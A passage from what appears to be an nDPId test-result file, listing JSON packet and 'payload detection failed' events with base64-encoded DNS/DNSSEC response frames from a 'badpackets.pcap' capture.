IAQEDBQMBAAHH50NT4xwBENYYIASJ2mD3BG9QGEiNhcrE595erpAhJx7YsU81LP9gTvm6xTLb7N7F1r2ajg=="} 00680{"packet_event_id":1,"packet_event_name":"packet","packet_id":80,"source":"badpackets.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":310,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":310,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"xDRrta3IeLr5aHlnCABFAAXc7j0gADgRdoqiljgTzLpQ5QA13WQG3OQmOZmEAAABAAYABgABDXN0YXRpYy1hc3NldHMDdG9wB2NvbWNhc3QDbmV0AAAwAAHADAAwAAEAAAA8AIgBAAMFAwEAAdNI7Jg7FgzKcoFbbTVFnNS103uNlzSi57w6MSU8g4N7BY45c8wRU0sUX4wCfS5mnvFDJOVeri9\/brOPAihImJbUq1qtU1hWYhriE+Q5okjx68WWhd44ZtMny6bsYRvUiusoqWjg23bXi9ii\/7fg+pccZPnCpi15g6KH4Pi07RLdwAwAMAABAAAAPAEIAQEDBQMBAAHH50NT4xwBENYYIASJ2mD3BG9QGEiNhcrE595erpAhJx7YsU81LP9gTvm6xTLb7N7F1r2ajg=="}
00220{"basic_event_id":9,"basic_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"thread_id":0,"packet_id":80,"source":"badpackets.pcap","alias":"nDPId-test","l4_data_len":276,"global_ts_msec":1495451802317} 00206{"basic_event_id":9,"basic_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"packet_id":80,"source":"badpackets.pcap","alias":"nDPId-test","l4_data_len":276,"global_ts_msec":1495451802317}
01906{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":81,"source":"badpackets.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":1212,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":1212,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"xDRrta3IeLr5aHlnCABFAAXcsBogADIR1B2hNyACzLpQ5QA1FhYKYhxxeiOEEAABAAIABAAND2F2aWF0aW9ud2VhdGhlcgNnb3YAAAEAAcAMAAEAAQAAAHgABIxaZc\/ADAAuAAEAAAB4AScAAQUCAAAAeFkriyJZIlCiJtkPYXZpYXRpb253ZWF0aGVyA2dvdgBcAnaQGheMvunF5C4cR5MJ72dSM8drk3RcE\/+nxnzfOogtDZmIWC2uUpk1r8xGZG2a2jRIA\/aj7zKkRbvNWBJ7qmI7yE\/unpmntn5Dyz3Um2RQBCjsXFWyfJgY5adyFQrx82AJTn0XIJJWlgv2g8gLH5cB5vq1Yx2QwIizFaT84HOR9Ro7mx0vPzffSQYtz10RZTKVLepM1R9WCwQoAlCmj1FX3PJSAVW1ysoAcCz8VNw8RQVeI7UOQsrNyeoeQU4fT9ZJVxaQxHfWRAhaVBdW1NMrgGV8IGluYRAdA\/hJk+MHJtjXbnaSeicSZRZLPiWIrQ+9vEs51K9tviWP1U47wFMAAgABAAAAeAAMBG5zLWUEbm9hYcBjwFMAAgABAAAAeAAIBW5zLW13wXnAUwACAAEAAAB4AAgFbnMtbnfBecBTAC4AAQAAAHgBJwACBQIAAAB4WSuLIlkiUKIm2Q9hdmlhdGlvbndlYXRoZXIDZ292ACem07do6v1NXUbeeSFCIj1ItSvoyoZ\/MkEVoL5rYeAY9tnwbNm\/RpXbQs3WZA84dHc8qApmpHZjNOzbQez3KZG7OK1f97Akn7bH1Ky7MKcrTPKH1PCPR0y4c94s6MFoH7fD6SfpHkqVyFkaspk\/OJpadSYLEQw32h1fGec9Via\/3fvcfA9UaUVW48GZIkYFNWZU\/dMHVDul0koiW1RkbrGjSj9jrN8M5OzzGNtQWIjEdvi5TKW5kPQt9XYqkeohSO6NHXOBkElsykELYz0FoRto8wvtZYGKZxoLfRlDES0YDpe+inWG1xWUXgvmym\/DRCrMlOOt9xEshGof6J1Kr9DBdAABAAEAAVGAAASMWiHtwXQAHAABAAFRgAAQJhAAIIAAjAAAAAAAAAACN8GMAAEAAQABUYAABIysEe3BjAAcAAEAAVGAABAmEAAgiACMAAAAAAAAAAI3waAAAQABAAFRgAAEoTcgAsGgABwAAQABUYAAECYQACCMAIwAAAAAAAAAAALBdAAuAAEAAVGAARwAAQUDAAFRgFkri31ZIlD9PnMEbm9hYQNnb3YAHTxu3oTuiFuFiCLpTl\/MK89BN9JBGjfKVUZAF3gZCKhMwx34GFStLHWeXnyc0jpz6oB3UKoWYWqIzl5uLmkTVdATO05wGhRkXmoRFvqHJQ49RQ+pBTNvjvfsZjt4sxWFaBX6dcM71YC5bIV281hFIsnrSJ79QSihSBHieSy9t5YTGlF5LCJijNEWEHJYxDID1Mza+tXKdNXJWHbkQhQwRPJKGX91jqgFPlz4hmfje77PrtKaUJ8h5eApMH+gaNXsNFvzV3nB+6kGVXv2VWVXVPXI3XzMFa8CKHbYrFGd7LJ4f5PFB725JCBxTQ4KeEOuBE0WXVqE9VoK1uYoB4PAK8F0AC4AAQABUYAB"} 01892{"packet_event_id":1,"packet_event_name":"packet","packet_id":81,"source":"badpackets.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":1212,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":1212,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"xDRrta3IeLr5aHlnCABFAAXcsBogADIR1B2hNyACzLpQ5QA1FhYKYhxxeiOEEAABAAIABAAND2F2aWF0aW9ud2VhdGhlcgNnb3YAAAEAAcAMAAEAAQAAAHgABIxaZc\/ADAAuAAEAAAB4AScAAQUCAAAAeFkriyJZIlCiJtkPYXZpYXRpb253ZWF0aGVyA2dvdgBcAnaQGheMvunF5C4cR5MJ72dSM8drk3RcE\/+nxnzfOogtDZmIWC2uUpk1r8xGZG2a2jRIA\/aj7zKkRbvNWBJ7qmI7yE\/unpmntn5Dyz3Um2RQBCjsXFWyfJgY5adyFQrx82AJTn0XIJJWlgv2g8gLH5cB5vq1Yx2QwIizFaT84HOR9Ro7mx0vPzffSQYtz10RZTKVLepM1R9WCwQoAlCmj1FX3PJSAVW1ysoAcCz8VNw8RQVeI7UOQsrNyeoeQU4fT9ZJVxaQxHfWRAhaVBdW1NMrgGV8IGluYRAdA\/hJk+MHJtjXbnaSeicSZRZLPiWIrQ+9vEs51K9tviWP1U47wFMAAgABAAAAeAAMBG5zLWUEbm9hYcBjwFMAAgABAAAAeAAIBW5zLW13wXnAUwACAAEAAAB4AAgFbnMtbnfBecBTAC4AAQAAAHgBJwACBQIAAAB4WSuLIlkiUKIm2Q9hdmlhdGlvbndlYXRoZXIDZ292ACem07do6v1NXUbeeSFCIj1ItSvoyoZ\/MkEVoL5rYeAY9tnwbNm\/RpXbQs3WZA84dHc8qApmpHZjNOzbQez3KZG7OK1f97Akn7bH1Ky7MKcrTPKH1PCPR0y4c94s6MFoH7fD6SfpHkqVyFkaspk\/OJpadSYLEQw32h1fGec9Via\/3fvcfA9UaUVW48GZIkYFNWZU\/dMHVDul0koiW1RkbrGjSj9jrN8M5OzzGNtQWIjEdvi5TKW5kPQt9XYqkeohSO6NHXOBkElsykELYz0FoRto8wvtZYGKZxoLfRlDES0YDpe+inWG1xWUXgvmym\/DRCrMlOOt9xEshGof6J1Kr9DBdAABAAEAAVGAAASMWiHtwXQAHAABAAFRgAAQJhAAIIAAjAAAAAAAAAACN8GMAAEAAQABUYAABIysEe3BjAAcAAEAAVGAABAmEAAgiACMAAAAAAAAAAI3waAAAQABAAFRgAAEoTcgAsGgABwAAQABUYAAECYQACCMAIwAAAAAAAAAAALBdAAuAAEAAVGAARwAAQUDAAFRgFkri31ZIlD9PnMEbm9hYQNnb3YAHTxu3oTuiFuFiCLpTl\/MK89BN9JBGjfKVUZAF3gZCKhMwx34GFStLHWeXnyc0jpz6oB3UKoWYWqIzl5uLmkTVdATO05wGhRkXmoRFvqHJQ49RQ+pBTNvjvfsZjt4sxWFaBX6dcM71YC5bIV281hFIsnrSJ79QSihSBHieSy9t5YTGlF5LCJijNEWEHJYxDID1Mza+tXKdNXJWHbkQhQwRPJKGX91jqgFPlz4hmfje77PrtKaUJ8h5eApMH+gaNXsNFvzV3nB+6kGVXv2VWVXVPXI3XzMFa8CKHbYrFGd7LJ4f5PFB725JCBxTQ4KeEOuBE0WXVqE9VoK1uYoB4PAK8F0AC4AAQABUYAB"}
00221{"basic_event_id":9,"basic_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"thread_id":0,"packet_id":81,"source":"badpackets.pcap","alias":"nDPId-test","l4_data_len":1178,"global_ts_msec":1495451817304} 00207{"basic_event_id":9,"basic_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"packet_id":81,"source":"badpackets.pcap","alias":"nDPId-test","l4_data_len":1178,"global_ts_msec":1495451817304}
00646{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":82,"source":"badpackets.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":274,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":274,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"xDRrta3IeLr5aHlnCABFAAXcQSkgAOcRefuDTlH+zLpQ5QA1iN8GuEyAW62FkwABAAAADAABCkhJMDFXRUYwMDEDZXRuA2RsYQNtaWwAAAEAAcAbAAYAAQAAAycAMAhlYWdsZWliMQJhZMAbC3JhbmR5LnNtaXRowBt3sikrAAAqMAAABDgACTqAAAADhMAbAC4AAQAAAycAmwAGCAIAAAOEWS\/o5lkiq9Y2JANkbGEDbWlsAEPjY6zabVfm9vwk6mSh9m4kj9u7ZDlkxqtiglIZTh\/RONTC0jpNpQmC+rJg1+X5ptcybqG6dncq1KPvSJq3fG1w8VDIG7zJf7f6G9gikY9VMCGmBxLlsKtyxHORaw=="} 00632{"packet_event_id":1,"packet_event_name":"packet","packet_id":82,"source":"badpackets.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":274,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":274,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"xDRrta3IeLr5aHlnCABFAAXcQSkgAOcRefuDTlH+zLpQ5QA1iN8GuEyAW62FkwABAAAADAABCkhJMDFXRUYwMDEDZXRuA2RsYQNtaWwAAAEAAcAbAAYAAQAAAycAMAhlYWdsZWliMQJhZMAbC3JhbmR5LnNtaXRowBt3sikrAAAqMAAABDgACTqAAAADhMAbAC4AAQAAAycAmwAGCAIAAAOEWS\/o5lkiq9Y2JANkbGEDbWlsAEPjY6zabVfm9vwk6mSh9m4kj9u7ZDlkxqtiglIZTh\/RONTC0jpNpQmC+rJg1+X5ptcybqG6dncq1KPvSJq3fG1w8VDIG7zJf7f6G9gikY9VMCGmBxLlsKtyxHORaw=="}
00220{"basic_event_id":9,"basic_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"thread_id":0,"packet_id":82,"source":"badpackets.pcap","alias":"nDPId-test","l4_data_len":240,"global_ts_msec":1495451840165} 00206{"basic_event_id":9,"basic_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"packet_id":82,"source":"badpackets.pcap","alias":"nDPId-test","l4_data_len":240,"global_ts_msec":1495451840165}
00711{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":83,"source":"badpackets.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":324,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":324,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"xDRrta3IeLr5aHlnCABFAAXcQccgAOcReV2DTlH+zLpQ5QA1iBUG6lPedjOFkwABAAAADAABCkhJMDFXRUYwMDEEbm9zYwNkbGEDbWlsAAABAAHAFwAGAAEAAABZADAIZWFnbGVpYjECYWTAHAtyYW5keS5zbWl0aMAcAAAHZgAAALQAAAASAAk6gAAAA4TAFwAuAAEAAABZAKAABggDAAAAtFkv4yBZIqYQMlUEbm9zYwNkbGEDbWlsAHAi\/\/IpY3Psvud3bXls8gvS7SxTXcJbJ2fO4LqoVAeoWw33Sok4nKe8G5wSzgrj+gHIwqz4AXRl3ZauyfrHZKtplIVp\/qYFFwFvnbKy4VuVxCDuV39nS0bYD6vwMZut5duIQsRD92AJMBuJaLwaFueObOvDDzhSu2qWb8T7Pru6wBcALgABAAAA"} 00697{"packet_event_id":1,"packet_event_name":"packet","packet_id":83,"source":"badpackets.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":324,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":324,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"xDRrta3IeLr5aHlnCABFAAXcQccgAOcReV2DTlH+zLpQ5QA1iBUG6lPedjOFkwABAAAADAABCkhJMDFXRUYwMDEEbm9zYwNkbGEDbWlsAAABAAHAFwAGAAEAAABZADAIZWFnbGVpYjECYWTAHAtyYW5keS5zbWl0aMAcAAAHZgAAALQAAAASAAk6gAAAA4TAFwAuAAEAAABZAKAABggDAAAAtFkv4yBZIqYQMlUEbm9zYwNkbGEDbWlsAHAi\/\/IpY3Psvud3bXls8gvS7SxTXcJbJ2fO4LqoVAeoWw33Sok4nKe8G5wSzgrj+gHIwqz4AXRl3ZauyfrHZKtplIVp\/qYFFwFvnbKy4VuVxCDuV39nS0bYD6vwMZut5duIQsRD92AJMBuJaLwaFueObOvDDzhSu2qWb8T7Pru6wBcALgABAAAA"}
00220{"basic_event_id":9,"basic_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"thread_id":0,"packet_id":83,"source":"badpackets.pcap","alias":"nDPId-test","l4_data_len":290,"global_ts_msec":1495451840209} 00206{"basic_event_id":9,"basic_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"packet_id":83,"source":"badpackets.pcap","alias":"nDPId-test","l4_data_len":290,"global_ts_msec":1495451840209}
00659{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":84,"source":"badpackets.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":283,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":283,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"xDRrta3IeLr5aHlnCABFAAXcQ9AgAOcRd1SDTlH+zLpQ5QA1+V4GwcnHlaqFkwABAAAADAABCkhJMDFXRUYwMDEDb29iA2RsYQNtaWwAAAEAAcAbAAYAAQAAAZUAMAhlYWdsZWliMQJhZMAbC3JhbmR5LnNtaXRowBt3sikrAAAqMAAABDgACTqAAAADhMAbAC4AAQAAAZUAmwAGCAIAAAOEWS\/o5lkiq9Y2JANkbGEDbWlsAEPjY6zabVfm9vwk6mSh9m4kj9u7ZDlkxqtiglIZTh\/RONTC0jpNpQmC+rJg1+X5ptcybqG6dncq1KPvSJq3fG1w8VDIG7zJf7f6G9gikY9VMCGmBxLlsKtyxHORa\/AgRGTYgjUNSA=="} 00645{"packet_event_id":1,"packet_event_name":"packet","packet_id":84,"source":"badpackets.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":283,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":283,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"xDRrta3IeLr5aHlnCABFAAXcQ9AgAOcRd1SDTlH+zLpQ5QA1+V4GwcnHlaqFkwABAAAADAABCkhJMDFXRUYwMDEDb29iA2RsYQNtaWwAAAEAAcAbAAYAAQAAAZUAMAhlYWdsZWliMQJhZMAbC3JhbmR5LnNtaXRowBt3sikrAAAqMAAABDgACTqAAAADhMAbAC4AAQAAAZUAmwAGCAIAAAOEWS\/o5lkiq9Y2JANkbGEDbWlsAEPjY6zabVfm9vwk6mSh9m4kj9u7ZDlkxqtiglIZTh\/RONTC0jpNpQmC+rJg1+X5ptcybqG6dncq1KPvSJq3fG1w8VDIG7zJf7f6G9gikY9VMCGmBxLlsKtyxHORa\/AgRGTYgjUNSA=="}
00220{"basic_event_id":9,"basic_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"thread_id":0,"packet_id":84,"source":"badpackets.pcap","alias":"nDPId-test","l4_data_len":249,"global_ts_msec":1495451840333} 00206{"basic_event_id":9,"basic_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"packet_id":84,"source":"badpackets.pcap","alias":"nDPId-test","l4_data_len":249,"global_ts_msec":1495451840333}
01231{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":85,"source":"badpackets.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":709,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":709,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"xDRrta3IeLr5aHlnCABFAAXctFYgADoRIiVBMSXFzLpQ5QA1N2wOM3VnSZ6EEAABAAIABgATA25zMQNucmMDZ292AAAcAAHADAAcAAEAAA4QABAgAQRwAAEAeiAAAAAAAACXwAwALgABAAAOEAEbABwHAwAADhBZlIDRWR3Z0YaKA25yYwNnb3YALVciLeV6\/9PVH3ix0oDMwPVXP+IuKi7iilwN8AXuICaEixRjMcL3k6CimR5Qqz2Ycw6GKR7q0Ru6zaeR+QYAjDqrD+MMW8dbCcINrpqJWjnqBRalN\/yYo\/yvsBa2wZPK3alx2x5VnRHoD2Js8UfeJJoW0zLMCnQkcnHnI8zIxKzPAlhcVwmcU+2j33B8sM29LmFlzJzazhfNwdxdRvaTNbUEhTzhlpB7woguGh3UcEHOLFrxazn6WmkxImFq2NBaB\/T0eDIozLqDuE+altkXto3Lyhd11i49paFgy0Mhg2C0ZQoPj1+cSeqFyHfhmq920VlYzrf1hk07KsH5DFRWS8BXAAIAAQAADhAAFghkbnNzZWMxMQdkYXRhbXRuA2NvbQDAVwACAAEAAA4QAAYDbnMzwFfAVwACAAEAAA4QAALADMBXAAIAAQAADhAACgdkbnNzZWM3wXXAVwACAAEAAA4QAAYDbnMywFfAVwAuAAEAAA4QARsAAgcCAAAOEFmUgNFZHdnRhooDbnJjA2dvdgCZi7bFn+nZ2P6WVw6o+kkwQuaKLgQuorJ5umHdHNd9400r4gzeBn33Ed0Zu7gD64lr2vhaLbxzLduR1aVAh1X4VlSh2jIQFWHIeoJ8Onasxl0l5tBD7VY1PneeZ1c40Al01eURgN\/WP7woAAMGLHDFWcaVfxALKzEXvlThyjffaO1k\/60LDVhVBDOZ6qeLxCdDVAfYZWLOALT5G71UUp\/mfWeY+zuZZrL9Mg=="} 01217{"packet_event_id":1,"packet_event_name":"packet","packet_id":85,"source":"badpackets.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":709,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":709,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"xDRrta3IeLr5aHlnCABFAAXctFYgADoRIiVBMSXFzLpQ5QA1N2wOM3VnSZ6EEAABAAIABgATA25zMQNucmMDZ292AAAcAAHADAAcAAEAAA4QABAgAQRwAAEAeiAAAAAAAACXwAwALgABAAAOEAEbABwHAwAADhBZlIDRWR3Z0YaKA25yYwNnb3YALVciLeV6\/9PVH3ix0oDMwPVXP+IuKi7iilwN8AXuICaEixRjMcL3k6CimR5Qqz2Ycw6GKR7q0Ru6zaeR+QYAjDqrD+MMW8dbCcINrpqJWjnqBRalN\/yYo\/yvsBa2wZPK3alx2x5VnRHoD2Js8UfeJJoW0zLMCnQkcnHnI8zIxKzPAlhcVwmcU+2j33B8sM29LmFlzJzazhfNwdxdRvaTNbUEhTzhlpB7woguGh3UcEHOLFrxazn6WmkxImFq2NBaB\/T0eDIozLqDuE+altkXto3Lyhd11i49paFgy0Mhg2C0ZQoPj1+cSeqFyHfhmq920VlYzrf1hk07KsH5DFRWS8BXAAIAAQAADhAAFghkbnNzZWMxMQdkYXRhbXRuA2NvbQDAVwACAAEAAA4QAAYDbnMzwFfAVwACAAEAAA4QAALADMBXAAIAAQAADhAACgdkbnNzZWM3wXXAVwACAAEAAA4QAAYDbnMywFfAVwAuAAEAAA4QARsAAgcCAAAOEFmUgNFZHdnRhooDbnJjA2dvdgCZi7bFn+nZ2P6WVw6o+kkwQuaKLgQuorJ5umHdHNd9400r4gzeBn33Ed0Zu7gD64lr2vhaLbxzLduR1aVAh1X4VlSh2jIQFWHIeoJ8Onasxl0l5tBD7VY1PneeZ1c40Al01eURgN\/WP7woAAMGLHDFWcaVfxALKzEXvlThyjffaO1k\/60LDVhVBDOZ6qeLxCdDVAfYZWLOALT5G71UUp\/mfWeY+zuZZrL9Mg=="}
00220{"basic_event_id":9,"basic_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"thread_id":0,"packet_id":85,"source":"badpackets.pcap","alias":"nDPId-test","l4_data_len":675,"global_ts_msec":1495451860723} 00206{"basic_event_id":9,"basic_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"packet_id":85,"source":"badpackets.pcap","alias":"nDPId-test","l4_data_len":675,"global_ts_msec":1495451860723}
00689{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":86,"source":"badpackets.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":304,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":304,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"xDRrta3IeLr5aHlnCABFAAXcqqsgAOcREHmDTlH+zLpQ5QA1TnkG1twua62FkwABAAAADAABClJDMDFXRUYwMDEEbmVtbwNkbGEDbWlsAAABAAHAFwAGAAEAAAA8ADAIZWFnbGVpYjECYWTAHAtyYW5keS5zbWl0aMAcd9p7lQAAKjAAAAQ4ABJ1AAAAA4TAFwAuAAEAAAA8AKAABggDAAAAPFkvM2hZIfZYHRkEbmVtbwNkbGEDbWlsAB1eP48NXB48YC39LxAk\/Khj2mVEQ6aS5HOSznEHbJsfSIIptRD6BtLuXwGHekuWL8Z8c4kWh5ITHm730bhtaFCQHR4MBMAUg\/QYfZB\/3QkezK+jd+kE5nVF\/tAkTs15nBpCsT3XFv1DW\/UqWuIhDZwgTv+++Q=="} 00675{"packet_event_id":1,"packet_event_name":"packet","packet_id":86,"source":"badpackets.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":304,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":304,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"xDRrta3IeLr5aHlnCABFAAXcqqsgAOcREHmDTlH+zLpQ5QA1TnkG1twua62FkwABAAAADAABClJDMDFXRUYwMDEEbmVtbwNkbGEDbWlsAAABAAHAFwAGAAEAAAA8ADAIZWFnbGVpYjECYWTAHAtyYW5keS5zbWl0aMAcd9p7lQAAKjAAAAQ4ABJ1AAAAA4TAFwAuAAEAAAA8AKAABggDAAAAPFkvM2hZIfZYHRkEbmVtbwNkbGEDbWlsAB1eP48NXB48YC39LxAk\/Khj2mVEQ6aS5HOSznEHbJsfSIIptRD6BtLuXwGHekuWL8Z8c4kWh5ITHm730bhtaFCQHR4MBMAUg\/QYfZB\/3QkezK+jd+kE5nVF\/tAkTs15nBpCsT3XFv1DW\/UqWuIhDZwgTv+++Q=="}
00220{"basic_event_id":9,"basic_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"thread_id":0,"packet_id":86,"source":"badpackets.pcap","alias":"nDPId-test","l4_data_len":270,"global_ts_msec":1495451867062} 00206{"basic_event_id":9,"basic_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"packet_id":86,"source":"badpackets.pcap","alias":"nDPId-test","l4_data_len":270,"global_ts_msec":1495451867062}
00551{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":87,"source":"badpackets.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":203,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":203,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"xDRrta3IeLr5aHlnCABFAAXcE+8gADUR5p1N8Pn0zLpQ5QA1XvoGcR\/WhA+EEAABAAIABQAHA25zMQNjc2MCbHQAAAEAAcAMAAEAAQABUYAABE3w+fTADAAuAAEAAVGAARoAAQcDAAFRgFkvGkZZB4jkr\/cDY3NjAmx0ALbKVVGDcRZDqk1lyGdWsP5IQ26mLHrrMMz2pPyson+cx8+CsnAw8\/PhfvXbGxejQaIrCYXN3lCaimZi4Ns9eAyNg0i42MNM14BM77qxS7I="} 00537{"packet_event_id":1,"packet_event_name":"packet","packet_id":87,"source":"badpackets.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":203,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":203,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"xDRrta3IeLr5aHlnCABFAAXcE+8gADUR5p1N8Pn0zLpQ5QA1XvoGcR\/WhA+EEAABAAIABQAHA25zMQNjc2MCbHQAAAEAAcAMAAEAAQABUYAABE3w+fTADAAuAAEAAVGAARoAAQcDAAFRgFkvGkZZB4jkr\/cDY3NjAmx0ALbKVVGDcRZDqk1lyGdWsP5IQ26mLHrrMMz2pPyson+cx8+CsnAw8\/PhfvXbGxejQaIrCYXN3lCaimZi4Ns9eAyNg0i42MNM14BM77qxS7I="}
00220{"basic_event_id":9,"basic_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"thread_id":0,"packet_id":87,"source":"badpackets.pcap","alias":"nDPId-test","l4_data_len":169,"global_ts_msec":1495451874121} 00206{"basic_event_id":9,"basic_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"packet_id":87,"source":"badpackets.pcap","alias":"nDPId-test","l4_data_len":169,"global_ts_msec":1495451874121}
00635{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":88,"source":"badpackets.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":265,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":265,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"xDRrta3IeLr5aHlnCABFAAXcxOggAOQR3V7OJiMDzLpQ5QA1oocGr2AqSlqFkwABAAAADAABClBIMDFXRUYwMDECYWQDZGxhA21pbAAAAQABwBoABgABAAACAgAtCGVhZ2xlaWIxwBcLcmFuZHkuc21pdGjAGneyKSsAACowAAAEOAAJOoAAAAOEwBoALgABAAACAgCbAAYIAgAAA4RZL+jmWSKr1jYkA2RsYQNtaWwAQ+NjrNptV+b2\/CTqZKH2biSP27tkOWTGq2KCUhlOH9E41MLSOk2lCYL6smDX5fmm1zJuobp2dyrUo+9Imrd8bXDxUMgbvMl\/t\/ob2CKRj1UwIaYHEuWwqw=="} 00621{"packet_event_id":1,"packet_event_name":"packet","packet_id":88,"source":"badpackets.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":265,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":265,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"xDRrta3IeLr5aHlnCABFAAXcxOggAOQR3V7OJiMDzLpQ5QA1oocGr2AqSlqFkwABAAAADAABClBIMDFXRUYwMDECYWQDZGxhA21pbAAAAQABwBoABgABAAACAgAtCGVhZ2xlaWIxwBcLcmFuZHkuc21pdGjAGneyKSsAACowAAAEOAAJOoAAAAOEwBoALgABAAACAgCbAAYIAgAAA4RZL+jmWSKr1jYkA2RsYQNtaWwAQ+NjrNptV+b2\/CTqZKH2biSP27tkOWTGq2KCUhlOH9E41MLSOk2lCYL6smDX5fmm1zJuobp2dyrUo+9Imrd8bXDxUMgbvMl\/t\/ob2CKRj1UwIaYHEuWwqw=="}
00220{"basic_event_id":9,"basic_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"thread_id":0,"packet_id":88,"source":"badpackets.pcap","alias":"nDPId-test","l4_data_len":231,"global_ts_msec":1495451891093} 00206{"basic_event_id":9,"basic_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"packet_id":88,"source":"badpackets.pcap","alias":"nDPId-test","l4_data_len":231,"global_ts_msec":1495451891093}
01885{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":89,"source":"badpackets.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":1189,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":1189,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"xDRrta3IeLr5aHlnCABFAAXcW3YgADURSGKMrBHtzLpQ5QA1nlwKS15OQ2CEEAABAAIABAANDmNhbWVvY2hlbWljYWxzBG5vYWEDZ292AAABAAHADAABAAEAAVGAAAShN0EOwAwALgABAAFRgAEcAAEFAwABUYBZK4t9WSJQ\/T5zBG5vYWEDZ292AIaf94KEuv9ZJnwf0eecIweTnGhU9b8l62tJ68k6dYKJPMmWgU+FCdyf\/QzA4d7evU\/WdY7C1qnmSAKUF\/jv82PtKEXWR9WzExnNSIkYyQ5Ek5HmxOvXRyAbUWYpnmzE31nJFS1DIaj6bHFKKyXa7kbE2lCLrY7Yw5mk7cXQ4OLgm8h\/Rf8PZUuRTxVYvWYo4+TVze1zHc8FD\/ypXkA55QgQpzIh2fdyiGaKmMRm4vEgVKR9qcV84hn2T6W953fnxyCiEAhN7\/HrL8+6Sed3bKvypaRqQ6VyWlurn4p4PS768LrGaurHjeTDHLHyOhT+cpJoI83IpDVd3ZFZXfga1z\/AVwACAAEAAVGAAAgFbnMtbnfAV8BXAAIAAQABUYAACAVucy1td8BXwFcAAgABAAFRgAAHBG5zLWXAV8BXAC4AAQABUYABHAACBQIAAVGAWSuLfVki